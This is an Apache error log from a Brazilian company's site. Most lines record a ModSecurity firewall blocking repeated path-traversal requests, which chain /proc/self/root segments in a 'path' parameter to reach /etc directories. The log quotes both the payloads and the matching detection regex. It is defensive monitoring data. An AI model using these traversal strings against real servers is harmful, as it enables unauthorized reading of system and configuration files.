[Thu Mar 19 15:06:46.672733 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:53772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7NgbLMZ6AikZjR9V9DgAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:06:50.495670 2026] [core:alert] [pid 14269:tid 140411557287680] [client 57.141.18.62:54928] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 15:06:59.134737 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:07:09.934086 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:43466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7Tcdf6f5d65gmYZSbKwAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:13.890045 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:54582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7Ufu8EFLIOrSqIpvIvAAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:17.533521 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:54594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7VQkwaGbbGflqUZDqWwAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:21.133808 2026] [proxy_fcgi:error] [pid 7235:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48332] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:07:23.050183 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:50260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7WwbLMZ6AikZjR9V9IQAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:25.471785 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:50266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7XRCii7xarUs8iHYJzQAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:27.712243 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:50268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7X-oXxyEfFpUF8f8ssgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:30.565557 2026] [:error] [pid 20435:tid 140411624429312] [client 74.7.243.128:50280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7YpJaM1-0uhhUQJM5-wAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:34.252805 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:46692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7ZhCii7xarUs8iHYJ0AAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:40.911855 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:46698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7bAbLMZ6AikZjR9V9JgAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:45.138175 2026] [proxy_fcgi:error] [pid 7545:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49294] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:07:46.995526 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.243.128:54170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7cv-YZRR_7pZ7nDKrQQAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:49.610998 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:45458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7dfu8EFLIOrSqIpvIxQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:51.764522 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:45466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7d_XLqtnMIWvjpaI-eQAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:53.821254 2026] [:error] [pid 21563:tid 140411658000128] [client 74.7.243.128:45468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7eUpm7ZmxKZTM4bZkpAAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:07:56.890883 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:45480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7fPu8EFLIOrSqIpvIxwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:08:00.402428 2026] [:error] [pid 8307:tid 140411683178240] [client 74.7.243.128:53424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7gL-FhjpZGs9ba8qK_QAAAwc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:08:01.805594 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.244.43:33950] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw7gRCii7xarUs8iHYJ1wAAAgk"]
[Thu Mar 19 15:08:10.492563 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.228.61:47588] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw7iv-YZRR_7pZ7nDKrUQAAA9A"]
[Thu Mar 19 15:08:11.626408 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.243.128:53432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7i_-YZRR_7pZ7nDKrVQAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:08:13.609785 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50394] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:08:16.587198 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.243.128:47422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7kP-YZRR_7pZ7nDKrXwAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:08:22.467065 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:34458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7lvu8EFLIOrSqIpvIywAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:08:30.231878 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:36976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7nvXLqtnMIWvjpaI-hAAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:08:35.801798 2026] [mime_magic:error] [pid 17887:tid 140411548894976] (70014)End of file found: [client 57.141.18.79:57574] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
